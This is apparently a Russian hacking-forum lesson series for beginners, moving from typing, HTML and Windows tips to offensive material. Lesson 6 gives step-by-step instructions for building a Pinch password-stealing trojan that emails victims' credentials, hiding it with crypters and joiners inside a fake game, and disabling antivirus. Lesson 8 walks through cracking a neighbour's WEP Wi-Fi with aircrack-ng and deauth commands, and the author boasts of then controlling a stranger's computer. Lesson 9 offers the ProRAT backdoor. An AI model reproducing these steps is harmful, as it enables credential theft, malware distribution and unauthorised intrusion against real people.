Было очень смешно когда я был на CC08 и Античатовцы включали фонарики для того чтобы увидеть клаву)))

Натренировать себя в слепом методе можно двумя способами...
Первый способ это зайти на http://play.typeracer.com/ зарегистрироваться там....и соревноваться с другими...
//можете меня вызвать на поединок если хотите....(нормальная скорость печатания в слепую это 31 символ в секунду.
Это очень удобно и интересно в отличии от других аналогов....я натренировал английскую раскладку именно там....
Второй способ это СОЛО на клавиатуре....
http://ergosolo.ru/download/ скачать можно тут....
Мой вам совет....сначало выучите физическое расположение клавиш.... а потом чисто шуруйте первый пробный  набор
текста на СОЛО....и вы быстро научитесь печатать.

Поверьте вам это в будущем очень понадобится....когда мы с вами начнём изучать языки программирования вы же не
будете всё время искать букавки на клаве)))это будет просто смешно...

Следующее что должен уметь и знать любой хакер это html
html не является языком программирования но при этом он очень функционален.
Без знания html вы не сможете продолжать учиться.
Поэтому чтобы не переписывать целые ресурсы ...там где уже написанно про html я просто дам ссылки...
http://html.manual.ru/
http://ru.html.net/tutorials/html/
Эти ресурсы самые актуальные....изучайте!

Считайте что это ваше домашнее задание ....выучить html !
___________________________________________________________________________

Пока хватит....изучите этот матерьял и вы сильно подниметесь.
Отнеситеьс с огромной серьёзностью ибо как это не печально но в России я давно уже не видел людей печатающих
слепым методом....и уж темболее хорошо знающих html....

Свернутый текст

Урок 3.

Если вы серьёздно поставили перед собой цель то вы должны не останавливаться ни перед какими трудностями.
И следующий мой урок будет посвещён преодолению этих трудностей.
Я вам дам слова которые в дальнейшем нам понадобятся для обучения. И без знания которых мы никуда не продвинемся.

Но так как мы с вами хакеры....хоть и начинающие...
это означает что "Все хакеры независимы" //см. Урок 1.
И в этот урок особенно важен для вас.

Чтобы не противоречить собственным понятиям "Все хакеры независимы"
Мой урок будет заключаться в том чтобы вы нашли определения на те слова которые я вам напишу.
Без них вы дальше не продвинетесь.

Те кто нашел определения к словам напишите их сюда. //желательно с сылкой на ресурс.
Один человек не может дать более чем 4 определения //это делается в целях того чтобы все могли попробовать силу
своих возможностей. И получить от меня высший рейтинг( звёздочки =) )

Дайте определения словам:
1)IP
2)MAC (не ноутбук a адрес)
3)TCP/IP
4)FTP
5)Telnet
6)Proxy
7)Socks
8)Shell (не автомобильное масло а компьютерное определения "оболочка")
9)Port (порт - что это такое и что за порты 80,21,22,111)
10)Отличие между Trojan  и Virus
11)DNS (что это , как расшифровывается и где используется)
12)Тунэль , Тунэлирование (что это такое , где используется)
______________________________________

Я уверен что у вас всё получится!
Это ключевые слова которые вы ни раз услышыте когда мы дальше будем обучаться.
Поэтому очень важно освоить их.
После того как будут даны все определения мы продолжем наши уроки!

//не забывайте параллельно учить html скоро к нему подойдём

Свернутый текст

Урок 4.

И так...в этом уроке мы с вами рассмотрим возможности нашей ОС (Операционная система)
Каждый кто хочет начинать свой путь в мир хакерства должен знать о такой великой ...бажной (глючиной)
системе как Windows XP!!!
И этот урок будет посвещён рассмотрению скрытых (и не очень) возможностей Windows XP

Я думаю каждый из вас сталкивался с проблеммой вирусов....или когда у вас затормаживала система...
или когда вы при загрузке системы очень много ждали пока загрузятся программы которые
вам сейчас вообще не нужны!!!(автозагрузка)

Наверняка каждый из вас знает комбинацию Ctr+alt+del её мы жмём когда хотим посмотреть что же такое?
что затормаживает систему?
И так каждый раз....
Давайте с вами познакомимся с такой скрытой от простых смертных приложением msconfig
вы его можете найти так Пуск---Выполнить...---(и там прописываем)msconfig
И перед вами откроется "Настройка системы"

Нас там будут интересовать 3 вкладки
1)BOOT.INI
2)Cлужбы
3)Автозагрузка

Бывает так что вы удалили свою ОС и установили новую.....
Но при этом у вас до сих пор при загрузке спрашивают....загрузить эту Windows XP или эту))) хотья на одной из
вкладок давно уже ничего нету.....

Вот за то чтобы удалить эти ложные вкладки...отчевает BOOT.INI
вообще знайте BOOT - это загрузка //(загрузка устройства...загрузка с флешки...загрузка с жосткого диска итд.)
Переходим на вкладку BOOT.INI и жмём "проверить все пути загрузки"
Далее если он у вас находит не рабочую ссылку....он предложит её удалить....что вы я думаю с удовольствием
сделаете....

Следующая вкладка это Службы
Ну сдесь я думаю всё понятно....
ставим галки где нужно...и убираем где ненужно....приведу пример...//установил себе iTunes и "Сервис iPod"
прописалась у меня в автозагрузке...а мне это надо*? вот именно ненадо....так что убираем галку и идём
смотреть "Автозагрузка"

Автозагрузка

Вот тут восновном я вылавливаю вирусы...которые нахальным образом прописали себя в автозагрузку.....
Кстати говоря!!!только что решил зайти в Автозагрузку... и обнаружил у себя трояна...которые прописал себя в
дирректорию
C:\WINDOWS\system32\amvo.exe //давить и только давить!!!!
Как определить что у вас....вирус или нет....
Да очень легко!!!!
В "Команда" прописан полный путь к файлу который требует система при загрузке.....
если вы видете какую то программу которая загружается без вашего ведома....и при этом по "Команда" - по этому
путю не узнаёте ни одной программы которой вы пользуетесь....значит скорее всего это вирус....НО если вы не
уверены что это вирус...проследуйте по этому пути...(к файлу) допустим C:\WINDOWS\system32\amvo.exe а мы
проследуем C:\WINDOWS\system32\ и попробуем найти файл с названием amvo.exe и просканируем его на предмет заражения.....
Уверяю вас в большенстве случаев это окажется вирус....который был пропущен вашим антивирусом....

Так же я думаю по названию вы поняли что от сюда можно "выдерать" назойливые программы...которые затормаживают
систему...как вы знаете чем меньше процессов тем быстрее и стабильнее работает ваша система....
Вот допустим....
iTuneshelper кому он сдался при загрузке????
или MSN или ICQ 6 или Skype ....конечно большинство из этих программ НАКОНЕЦ СДЕЛАЛИ галочку автозагрузка !!!
Но к сожалению не все....

Следующий очень важный для хакинга полу не видемый инструмент это regedit aka (also known as) реестр
Пуск--Выполнить--regedit
Это мощное оружие в руках пользователей...и конечно же Хакера))))
Больше чем http://win-reg.narod.ru/intro/intro_01.html?#1 тут вам никто не расскажет.... //основ естественно....
Собственно там всё компактно написанно про реестр.....

И просто необходимо для просмотра http://forum.xakep.ru/m_1051645/tm.htm вот эта страница она вас многому научит....
и вообще респект тому кто пополнял её.....//там описанно много фишек которые оптимизируют систему ...сделают её
уникальной....и много много еще чего....

Вот одна из фишек которые я юзал давным давно... и удивлял друзей....это "Меняем заголовок окна IE"
прочитайте как это сделать...и сделайте...//познавая такие фишки...вы всё больше и больше будете понимать структуру
реестра и за что он отвечает.

Так же реестр помогает оптимизировать систему...тоесть работать быстрее...
Вот тому простое доказательство....
"Убрать принтеры и факсы, а также назначенные задания"  //это описано всё там же....

Ну и на последок я вам напомню про такую уникальную вещь как "Командная строка"
Находится она
Пуск--Выполнить--cmd

Через командную строку можно отдавать команды
Тофталогия но это так)))
Вам просто необходимо познакомиться с ней(командной строкой)
Чтобы изучить её всё что вам нужно это знать 2 команды....
1)help
2)(команда)/?  - это для того чтобы получить более полную информацию об этой команде. Пример: COPY/?
_________________________________________________________________

Ну и самое основные команды....для начала пожалуй будут
cd - перемещение по деррикториям. Пример : cd C:\ (и мы попадаем в эту диррикторию)
DIR - показывает всё содержимое дерриктории в которой вы находитесь.
RD - удаление папки
MD - создание папки
DEL - удаление одного или нескольких файлов

__________________________________________________

Так же я думаю все знают о такой встроенной служебной программе как
"Востановление системы" но не все знают как она полезна.
Находится она сдесь
Пуск--Все программы--Стандартные--Служебные--Востановление системы

Что эта встроенная программа делает? Она востонавливает систему на тот момент когда она была в том состоянии, когда
вас всё устраивало....
Но при этом есть одна маленькая деталь...она удаляет все программы которые были установлены....(до того времени
когда была поставленна точка востановления) //о как закрутил)))
Пример:Вы сегодня установили Фотошоп. и сегодня же вы подхватили троян...или вирус....(короче система начала
давать сбои) вы берёте делаете откат на день назад .... и у вас всё становиться так как было.....день назад....
тоесть без фотошопа....
Но не путайте файлы с программами!!!!

Мне с жалостными глазами говорят.....а я слышал что если сделать откат то удалятся все мои Work.doc Emploee.doc
которые я сделал.....

Файлы - это то что сделано в программах....а программы - это то что редактирует файлы.
Так что если вас что то не устраивает .....(в работе системы) не промедляйте ....делайте откат на то время когда
всё было отлично!

-------------------------------------------------------

Ну и на последок  расскажу админовскую фишку....
прописываем в командной строке ipconfig /all
и у вас как на ладони все сведенья о вашем соединении....

0

8

http://newhackers.mybb.ru/img/avatars/000a/71/82/2-1250716879.gif

Урок 6.

Возрождение динозавров!

Свернутый текст

Все файлы которые будут использоваться в статье находятся
здесь :  http://rapidshare.com/files/148091408/_ … _.rar.html

И так....
Сейчас предполагается то , что вы не знаете ни одного языка программирования......
Но это не беда! Мы всегда можем воспользоваться чужим творением!
И сегодня я вас познакомлю с Hack-Tools`ами
Мы сейчас на стадии Кидеров (от англ. KID - ребёнок) потому , что мы с вами к сожалению не знаем программирования и
не можем написать свои программы.
Но как бы это не звучало ....ребёнок.....им тоже надо уметь быть...иначе бы не создавалось куча тем ....
как использовать Pinch....
Собственно с него мы и начнём.

Pinch
Одна из самых старых Хак тулз.
Что он делает....Он просто напросто выдерает все сохранённые пароли на компьютере...при этом прихватывая с
собой информацию о нём.
Сегодня надо развеять миф насчёт того что Pinch(mail) уже не в игре.
Еще как в игре!
Мало того я его  только и юзаю....вместо того чтобы парится насчёт хостинга....и того как к вам прийдут
отчёты или нет.....
Но так как прикрыли на mail.ru эту фитчу....все впали в лихорадку и стали юзать Гейт для получения отчётов.
Ну а мы с вами пойдём по менее сложному пути.
и так вам понадобится
1)Pinch3 (mail)
2)Нет не прямые руки....)))тут они не нужны))))(Интернет) =)//вообще отвыкайте от прямых рук ....
представьте если бы у всех были прямые руки...как бы мы ели c ложки?
3)Parser2
4)staff (и всякая мелочь)

Поехали делать наш мэйловский пинч!!!)))

1) Мы должны зарегистрироваться на mail.tut.by  (два мыла)// допустим qwerty1(sender) и qwerty2(receiver)
2)Переходим к настройкам пинча...
Открываем Pinch3 (mail) и если приглядется то там данные будут разделены на Sender(отправитель) и Receiver(получатель)
Заполняем Sender
E-mail --- Указываем нашу почту.....qwerty1@mail.tut.by
SMTP server (надеюсь вы знаете что сервер это тот кто предоставляет вам услуги) в данный момент сервер это mail.tut.by
поэтому мы указываем так ----smtp.mail.tut.by
User --- даёте пользователя который будет отправлять отчёты qwerty1 //обратите внимание на поле E-mail =))
делаем вывод кого писать должны
Password --- пaроль от пользователя qwerty

Далее переходим к полю получатель....тот кто будет получать отчёты от Sender`a
Е-mail ---- вводим аккаунт того кто будет получать ....в нашем случае это qwerty2@mail.tut.by

Subject это тема письма....которая будет указываться  при получении отчёта..... я лично ставлю Project
File name это имя файла ....которое будет прикреплено к письму...(в дальнейшем будет называться отчёт) я его
называю Project.bin

Options --- от туда убираем все галки

Далее жмём Build и получаем полноценный троян))))
Он у вас сохранится в той же дерриктории где и Билдер.....с именем Pinch3.exe

Для того чтобы (прочитать пароли которые заключены в Project.bin) нам нужна другая программа.....
Её зовут Parser
Эта программа дешифрует этот файл и перед вами открывается взор всего отчёта.
Для того чтобы её установить нужно.....
1)Создать в диске C:\ папку Reports
2)Копировать Parser2.exe в эту папку.
3)Открыть Parser2 зайти во вкладку  Parser--Settings--DB Profiles--(и там вы увидите  Default (нажмите на это поле)
появится Дефалтные настройки , тобишь стандартные. Жмём ОК и у нас появляются дополнительные папки....)))не
пугайтесь так и надо....

И теперь наконец....как же из файла *.bin получить информацию.....
Берём сохраняем этот файл себе на Жёсткий диск......и перетаскиваем в папку Reports после чего открываем Parser
и видим что у нас появилось письмо......Щёлкаем на него два раза....(ну или один...кому как нравится..) и
получаем полноценный графический отчёт.....(в виде древа)
System info \ Disks итд......щёлкаем по этим папкам и вкладкам .....и получаем с правой стороны поля информаци...)))
(ну я думаю вы разберётесь.

Я бы мог на этом и закончить описание великолепного троя ...но я не такой как все))))
Если вы не заметили ....то я назвал тему "Возрождение динозавров" не просто так.....
ибо моей главной целью в этом уроке познакомить вас с Крипторами и Джойнерами

Криптор - программа которая шифрует код другой программы до неузноваемости....но при этом зашифрованная программа
остаётся работаспособной.(используется для того чтобы антивирусы не могли понять что это вирус)
Джойнер - программа которая склеивает две программы во едино при этом есть возможность менять иконку двух
склеенных программ.(используется для дезариентирования пользователя которому вплавляют троян / вирус)
/*-ОЙ посмотри какая суперская игра!
-(открывает файл ) И открывается игра....О да и в правду супперская игра!!!!
а в это время отчёт уже прилетел к нам в почту)))) */

Начну я всётаки с Джойнеров....
И я вас познакомлю с "FreeJoiner Stub v1.7 (C)"
Это офигенноый джойнер....который можно использовать бесконечно....если его вид склеивания "пропалят" антивирусы....
то всегда можно ПРОСТОМУ ПОЛЬЗОВАТЕЛЮ поменять его в ручну....и как им пользоваться я покажу вам в видео....
которое я сделал специально для вас.
http://rapidshare.com/files/148079174/Manual.rar.html // извините за то что большой файл по размеру получился....
1695 КВ...

Теперь перейдём к крипторам
Их бывает очень много....
Но Крипторы бывают 2х типов.....
1)Полиморфные - те крипторы которые используют особый вид шифрования(агрессивный) ....который очень мощный....
но при этом он может "зашифровать" так...что файл даже не откроится... и этот вид крипторов не дружит с
Джойнерами и с другими видами Крипторов...в отличи от простых Крипторов он очень сильно изменяет сигнатуру кода.
2)Простые Крипторы....Их примечательность в том что они дружелюбны...в отличии от полиморфных они дружат и с
джойнерами и со своими собратьями)))
Их можно использовать в связке.....Один простой криптор + Другой простой криптор......
(Один допустим палится....а если заюзаешь второй в месте с первым то трой уже палиться не будет....)

Крипторы сами по себе очень простые в использовании....они просят максимум это путь к файлу который нужно зашифровать.....
И иногда можно ставить разные галочки)))(которые меняют вид шифрования в ту сторону которая выгодна вам.)

Так получилось что у меня под рукой нету ниодного нормального криптора....но вы всегда можете найти их в Гугле....
Главное понять что функция крипторов для нас ....заключается в том чтобы антивирусы не смогли распознать Троян.
А функция джойнеров в том чтобы пользователь не заподозрил обманку.

Используя эти две вещи вы сможете добиться максимальной пробиваемости ваших творений.

_______________________________________________________________________________________________
Так же хочу зарание предупредить всех....
ВСЕ паблик ХАК ТУЛЗЫ ПАЛЯТСЯ АНТИВИРУСАМИ(тоесть во время того как включен антивирус ими нельзя пользоваться)
поэтому отключайте антивирусы когда будете ознакамливаться с этим уроком.....если вы мне не доверяете тогда
оставайтесь в неведеньи дальше....
А я вас уверяю что я в инструменты малвари не пихал.
_______________________________________________________________________________________________

Надеюсь вы что то новое узнали из этого урока.
И вопросы которые вы задавали раньше будут сняты.

Свернутый текст

Урок 7.

С чего начать!

Первым делом нужно уяснить , что хакер не хакер....если он не знает хотябы 2х языков программирования.
Нужно знать , что есть компилируемые и интерпретируемые языки программирования.
К компилируемым относятся (C++ ,Delphi, C# итд.)
К интерпретируемым (PHP,Perl,Python итд.)

Их главное различие между собой заключается в том что компилируемые языки создают программу из исходников(кода)
при помощи другой программы - компилятора.
Компилятор проверяет код на ошибки а потом из него делает программу.//процесс называется компилированием.

А интерпретируемые языки не требуют такого подхода. Зато для того чтобы написанный код работал нужно иметь
специальную программу интерпретатор.

Таким образом Компилируемые языки преобразуют написанный код в машинный тем самым получают основной
файл(программу)//допустим prg.exe
А интерпретатор не преобразует код. Но для того чтобы он исполнялся нужно иметь (этого языка)программу
интерпретатор.//prg.php (и для этого нужна программа чтобы открыть этот файл.)

Так вот...к чему я это всё.....

Вы должны для себя выбрать путь....
Каким хакером вы хотите стать.....WEB или Crack`er
1)Если хотите ломать сайты то вам надо для начала изучать интерпретируемые языки....я начал с PHP и
javasсriрt...
2)А если крякером(ломать программы).....то надо изучить Assembler и C++ естественно C++ в начале...
для того чтобы понять структуру.....

И тут я бы вам посоветовал выбрать первый вариант ибо он легче.....и на нём можно заработать больше)))хотя
если вы знаете хорошо второй способ на нём можно тоже очень хорошо заработать)))

Но расскажу я вам про прервый ибо я выбрал его.

И так....первым делом вам надо понять ,что сервер...это такой же компьютер с Виндой(или с любой другой OС)
который предоставляет вам доступ к некоторым файлам....
В часности WEB ..... допустим google.com ихний сервер держит в себе такие же WEB странички как и все....
.у него есть index.php или index.html итд.

Я надеюсь что вы выполнили моё прошлое домашнее задание и выучили html !
Без него вы никуда не денетесь....это костяк.....
Для изучения мы выберем языки PHP и SQL
Так как PHP очень распрастронён и SQL так как в дальнейшем мы будем ломать БД(базы данных) используя
запросы....//этот вид атаки называется SQL injection

И начнём мы с того что сделаем нашу машину сервером!!!(тоесть установим Apach+PHP+SQL)
Это понадобится нам для обучения...
Вот ссылка на файл который нужно установить. ТУТ
Этот установочный файл не заставит вас гемороиться насчёт настройки конфига PHP+MySQL....(на данном этапе
обучения я считаю вам это никак не пригодится)
Когда будете настраивать там где будет написанно localhost не меняйте ничего...(чтобы в дальнейшем я мог
объяснять и вы не сбились...а все остальные поля заполняйте как хотите.)

И так...надеюсь с установкой всё прошло чики пуки)))
Теперь давайте затестим....всё ли так гладко как нам кажется....
Открываем любой браузер....(браузер - программа в которой вы просматриваете WEB странички) и набераете в
URL (адрессная строка) localhost
И если установка прошла на ура...то у вас появится страничка с заголовком "The AppServ Open Project -
2.4.0 for Windows "

После того как вы увидели эту страничку...можно преступать к обучению.

Первые понятия WEB страничек
Переходим к созданию первой своей странички....написанной на PHP!
И так...смотря куда вы установили Апач в такой директории и ищите....если вы устанавливали по дефолту
(стандарту) то переходим C:\AppServ\www
и в директории создаём папку с именем  google //заметьте что папка названна маленькими буквами.(регистр важен)
Заходим в неё ....и создаём файл index.php //регистр важен
Теперь редактируем index.php //пишем в вайле
_____________________

<?php
printf("My first Google!")
?>

_____________________

Опять открываем Браузер и вводим в URL localhost/google
и если вы всё правильно сделали у вас должна открыться страничка а там написанно "My first Google!"

Надеюсь вы поняли структуру вайловой системы...что index.php или index.html это стартовая страничка.....
и она(этот файл) открывается первой в папке если она указанна.
И то что WWW это стартовая дерриктория ....откуда начинается localhost...если вы внимательны ....
то заметили что index.php в этой дерриктории тоже присутствует..... поэтому когда вы набрали
localhost у вас открылась страничка...а не пустота)))

ИТОГ:
Мы с вами поставили свой собвстенный сервер благодоря которому вы можете продолжать обучаться....
и не спрашивать на форумах как открыть love.php =))
Так же я надеюсь вы разъяснили для себя какого вида языки программирования бывают....
и выбрали для себя что вам нужно.

И самое главное....не повторяйте моей ошибки....
параллельно не изучайте 2 языка программирования....у вас в голове будет такая каша....
вы запутаетесь во всём что можно.....
А моя беда....я начал изучать C++ и PHP одновременно....и те кто знают эти языки....
поймут меня)))ибо они оба до боли похожи...но различия всётаки имеются....//вывод...
путанница и в том и в том языке)))естественно я потом это исправил....но это заняло время

Вот вам учебник по PHP http://www.softtime.ru/bookphp/gl1_1.php //это для тех у кого лимитный или
медленный интернет....
А для тех у кого безлимитный и быстрый интернет....я выкладываю ВИДЕО УРОКИ по PHP & MYSQL
Rapidshare
http://rapidshare.com/files/150332728/1.part01.rar.html
http://rapidshare.com/files/150335933/1.part02.rar.html
http://rapidshare.com/files/150338304/1.part03.rar.html
http://rapidshare.com/files/150340224/1.part04.rar.html
http://rapidshare.com/files/150342354/1.part05.rar.html
http://rapidshare.com/files/150343811/1.part06.rar.html
http://rapidshare.com/files/150345879/1.part07.rar.html
http://rapidshare.com/files/150349053/1.part08.rar.html
http://rapidshare.com/files/150351471/1.part09.rar.html
http://rapidshare.com/files/150353524/1.part10.rar.html
http://rapidshare.com/files/150357909/1.part11.rar.html
http://rapidshare.com/files/150360297/1.part12.rar.html
http://rapidshare.com/files/150361864/1.part13.rar.html
http://rapidshare.com/files/150365282/1.part14.rar.html
http://rapidshare.com/files/150366875/1.part15.rar.html
http://rapidshare.com/files/150369218/1.part16.rar.html
http://rapidshare.com/files/150371856/1.part17.rar.html
http://rapidshare.com/files/150373276/1.part18.rar.html
http://rapidshare.com/files/150375542/1.part19.rar.html
http://rapidshare.com/files/150377380/1.part20.rar.html
______________________________________________________

Можно пропустьить.
_____________________________________________________________________________________
Сегодняшний урок будет посвещён взлому WiFi Сетей...вы бы знали как приятно когда ты взломал очередную сетку...
Но я собственно и пишу эту статью чтобы вы узнали каково это!))))
Сегодня (позаимствовал сетку) в нашем районе=))только ради этого урока....//превыкайте слово позаимствовал это взломал.
(чтобы не палиться)))
Но самое приятное это был не халявный интернет.....а Удалённый доступ!!!который я совсем не ожидал)))
//пишу под эмоциями так что извиняюсь за смайлы))).
_____________________________________________________________________________________

Урок 8.

Взлом Wifi
Вообще взлом Wifi Сетей называется Вардрайвинг (wardraiving)
//для того чтобы у вас всё получилось в этом уроке вам нужен либо ноутбук(с потдержкой Wifi) либо комп с сетевой картой.
(короче тоже потдержка Wifi)

И так первое с чего надо начать это с выбора инструмента взлома.....
Сегодня я вас познакомлю с самым известным хакерским "инструментом" //вернее сказать Операционной Системой(ОС)

BackTrack 3

Эта операционная система созданная для анализа сетей....и "тестирования безопасности"//но мы то теперь знаем для
чего она =)

Но не расстраивайтесь....вам не надо будет удалять вашу любимую Windows для того чтобы пользоваться этим уроком.

BackTrack 3 бутабл операционная система(тоесть её можно загружать из других носителей  таких как USB (флешка) CD
(диск) или WMware (виртуальная машина)
Я вам расскажу как можно поставить эту операционную систему на USB и на CD .//для USB понадобится 784 MB а для
CD 695 MB свободного места.

Разделим на несколько пунктов установку.

1)Скачиваем дистрибутив (ОС) c официального сайта http://www.remote-exploit.org/backtrack_download.html
//перед тем как качать обратите внимание там несколько дестрибутивов.....выберите тот который вам нужен.....
тобишь USB или CDROM .

2)После того как вы скачали...дистрибутив распакуйте его в любое место на компе и у вас появятся две папки....
boot и BT3

3)Открываете папку BT3 и запускаете файл make_iso после чего переходите в папку boot и открываете bootinst
(при этом и в том и в том файле вас просят несколько раз нажать Enter сделайте это...)

4)Так наш дистрибутив готов....теперь если вы хотите пользоваться USB версией ....то просто перекиньте эти
две папки в корневую деррикторию(корнивой деррикторией называется первоначальное место сохранения....тоесть
если ваш USB находится F:\ то корнивая дерриктория для него и будет F:\  )  и проделайте пункт 3 еще раз....
ВАЖНО что бы флешка была пустой (на момент залития папок)

//ТАК ЖЕ  ЧАСТАЯ ОШИБКА ЭТО ТО ,ЧТО ВЫ КОПИРУЕТЕ НА НОСИТЕЛИ НЕ 2 ПАПКИ А ОДНУ ...А В НЕЙ ЭТИ ДВЕ....
ЭТО НЕ ПРАВЕЛЬНО.
НУЖНО ЧТОБЫ У ВАС БЫЛО 2 ПАПКИ А НЕ ОДНА ПАПКА А В НЕЙ ЭТИ ДВЕ.

А что касается CD мы вставляем пустой диск....там где у вас находится пустой диск....(у меня это диск D:\)
перебрасываем эти две папки в эту деррикторию и проделываем пункт 3 еще раз.
И только после этого прожигаем диск....

Вот что должно у нас получиться.... http://img241.imageshack.us/my.php?imag … 834pf7.jpg

И так.....с установкой нашей ОС мы закончили...но теперь её надо как то загрузить...!!!!

И это мы делаем через BIOS!
это для тех кто не знаком.... http://ru.wikipedia.org/wiki/BIOS
//Биос загружается при загрузке компьютера...тоесть вы перезагружаете компьютер...и когда он только
начал загружается..(не появилось окошко загрузки Windows) вы жмёте определённую клавишу несколько раз за
секунду....и у вас появляется BIOS а не загрузка Винды....)
Но тут возникает маленькая проблеммка....у всех разные BIOS`Ы
И соответственно разные комбинации клавиш...для того чтобы загрузить его....

У меня лично он загружается на клавишу F12 но бывают разные случаи.....поэтому почитайте вот эту ссылку
http://itc.ua/node/32864 (Загрузка BIOS) там разные клавиши приведены.

После того как вы зашли в BIOS (надеюсь у вас это таки получилось) вам надо найти Всё что связанно с
вкладкой BOOT ( загрузка) и поменять её параметр на тот который вам нужен....тоесть если у вас USB на
USB если CD то на CD ....(а по дефалту она стоит на hard Disc - жосткий диск)
//USB в некоторых Биосах принимается как Floppy Disc
А в некоторых BIOS' ах приоритет загрузки надо поменять...тоесть с какого устройства надо пробовать
грузиться в первую очередь а с какого во вторую....
НО ВСЁ ЭТО СВЯЗАННО СО ВКЛАДКОЙ ИЛИ ПОЛЕМ BOOT  //так что ищите и разбирайтесь...вам это понадобится....
во всяком случае можете у друга попросить чтобы он вам помог загрузиться с определённого носителя с
помощью вашего BIOS`а

Так же при загрузке очень часто можно увидеть сообщение о возможности загрузиться с Биоса и какую
клавишу надо нажать...так что читайте что вам пишут когда вы только включаете компьютер.

Когда мы наконец таки правильно настроили биос и загрузились с нашего носителя.....( нашу ОС )

То сначало вы увидите как BackTrack просит вас выбрать вашу видео карту.....обычно для всех ноутов
это первая строчка....но для моего это оказалась третяя (Vesa) выберите ту видеокарту которая у вас...
и если вы выбрали её правильно то вы увидите как BackTrack грузится.....и после чего вы попадаете в
графическое меню(рабочий стол) как в винде....

Переходим к взлому
Всё мы вошли... теперь нам надо узнать какой у нас интерфейс....у нашей сетевой карты....это можно
узнать через консоль //см рисунок как войти в консоль.
Набрав команду  airmon-ng
Вот как это выглядит http://img184.imageshack.us/my.php?imag … ot1il0.png

Когда мы узнали какой у нашей сетевой карты интерфейс(у каждого он может быть разный ...подставляйте свой)
мы запускаем его в режим мониторинга это нужно для того чтобы сетевая карта могла быстрее собирать пакеты
передаваемые сетью.
Делается это командой airmon-ng start eth0 (cм рисунок выше)

Всё сетевую карту мы подготовили.
Теперь нам надо узнать что вообще за сети сейчас присутствуют и какие виды защиты они используют.
для этого мы в той же консоли прописываем команду airodump-ng eth0 (жмём и появляются строки с сетями...
их идентификаторами каналами...итд.) после того как вы видите что больше уже ничего не появится....
вы жмёте Ctrl + X или Сtrl +Z  попробуйте эти две комбинации я просто точно не помню....но скорее всего первая....
это нужно для того чтобы остановить анализ сетевого пространства и уже непосредственно перейти к нападению.

И так мы собрали информацию....
вот что она означает...... http://img142.imageshack.us/my.php?imag … ot5gn6.png

Мы будем рассматривать взлом Wifi  с защитой WEP так как она сама уязвимая....и при этом остаётся популярной.....
есть еще несколько видов такие как WPA\WPA2 про них вы можете где угодно прочитать....
а я вам закладываю основу....

После того как мы узнали основную информацию о сети....а это
1)Идентификатор сети
2)Канал на котором расположена сеть
3)Вид шифрования (WEP)

Можно приступать к воровству....
Нам нужно задать такой запрос в консоле
airodump-ng -c (Канал сети которую ломаем) --bssid (идентификатор сети которую ломаем) --ivs -w capturefile eth0

--ivs это значение показывает что не все пакеты нужно собирать ....а только с определённой информацией
хранящей в себе пароль.
-w (имя файла) это значение для того чтобы куда то сохранить все эти пакеты....
eth0 интерфейс нашей карточки...

Вот как выглядит запрос в моей ситуации... http://img142.imageshack.us/my.php?imag … ot5gn6.png
//сопаставьте его со своим и всё поймёте.....
Жмём Энтр и у вас получается , что из всей горы Wifi которых вы видели....остаётся только эта точка....
и пакеты (#Data) должны собираться быстрее...
#Data хранят в себе "кусочки пароля" и именно их нам надо собирать.....скорость их добычи зависит от
того подключён ли к этой сети другой пользователь и насколько активно он использует его....чем активнее он
использует инет тем быстрее мы его ломанём....
есть два вида ключа 64 битный и 128 битный....для 64 бита потребуется от 50 000 до 200 000 векторов
инициализации, а для успешного взлома 128-битного WEP - от 200 000 до 700 000!
эти цыфры были приведины http://www.thg.ru/network/20050806/onepage.html этим ресурсом....
Хотя на практике мне для взлома 64 битного хватало 20000 пакетов...(векторов инициализации) а для
128 битного 60000....

Так вот...как узнать подключён ли к сети пользователь....
вот смотрите.... http://img147.imageshack.us/my.php?imag … ot4xd2.png

Далее мы хотим повысить фактор взлома...(ускорить его)//это можно устроить если  к точке подключён
другой пользователь....

Открываем еще один терминал и прописываем команду
aireplay-ng -a (идентификатор сети) -c (идентификатор пользователя) --deauth 10 eth0
еще разок посмотрите пример... http://img147.imageshack.us/my.php?imag … ot4xd2.png
сделайте эту команду раза 3 .....она поможет для получения #Data.

Через некоторое время мы собрали достаточное количество пакетов(на наш взгляд)....(если вы не
уверены что это количество достаточно вы можете просто не закрывать терминал там где вы собираете эти пакеты...
и проверить....взломали ли вы уже сеть.....)
А делается это так....
Открываем новый терминал и вбиваем туда команду
aircrack-ng (и перетаскиваем с корневой папки /root файл который был создан в моём случае это capturefile.ivs)
и вставляем его в терминал.....
у вас получится что то вроде этого
aircrack-ng '/root/capturefile.ivs'
А вообще смотрите рисунок....  http://img517.imageshack.us/my.php?imag … ot6jf9.png
после чего жмём энтр....и ждём перебора.....
Если вы достаточно насобирали себе пакетов...то тогда вы получите вот такой результат
http://img147.imageshack.us/my.php?imag … ot7at6.png //И это будет ключь от вашей Wifi точки....
//Частая ошибка ключ пишется без двоеточия...
А если нет то вам выдодут ошибку о том что мало пакетов...

Вот собственно и всё со взломом Wifi))

Но я до расскажу историю которая приключилась со мной....
после того как я своровал вайфай ключь ...я просканировал диапозон IP адресов этой сети....от
192.168.1.1 до 192.168.1.255

И обнаружил еще несколько компов в сети....
Ради прикола решил просканировать на открытые порты один комп(при помощи nmap)....и оказалось
что у него открыт порт от программы Radmin(программа для удалённого доступа...) я скачал клиента
и полностью рутил его компом...как весело было наблюдать за его рабочим столом как он гамал в Сталкер))))
вот скриншот как я это сделал.
http://img262.imageshack.us/my.php?imag … 881wa5.png

________________________________________________________
Подведём итоги.
1) Мы с вами познакомились с BIOS`om и его возможностью загружаться с разных дисковых накопителей.
2) Мы  поняли что бывают разные виды защит Wifi и то как они уязвимы.
3) Я думаю вы теперь поняли что Radminom лучше не пользоваться)))) особенно если часто подключаешся
к незнакомым сетям.
4)Познакомились с очень НУЖНОЙ для нашего дела ОС (BackTrack) кстати она основанна на UNIX поэтому
вы параллельно можете понять файловую систему UNIX .

И наконец вы хоть и немного но поработали с терминалом.
__________________________________________________________
Я заранее извиняюсь что урок получился сложным......как мог старался упростить...
давать меньше теории которую вы можете при необходимости найти...а показывал одну практику.

___________________________________________________________________

Можно пропустить.
_______________________________________________________
В этом уроке я рассмотрю очень известную хакерскую тулзу...
А уже в следующем уроке мы непосредственно перейдём ко
взлому сайтов =) так что вам осталось последний урок потерпеть)))
И я надеюсь что вы уже все выучили html.
_______________________________________________________

Урок 9.

ProRAT

ПроРАТ это очень известная троянская программа которая использует такую систему "атаки" как backdoor (Бэкдор) - что
это такое можно узнать от сюда http://ru.wikipedia.org/wiki/Backdoor

Я специально выложил её для вас сюда
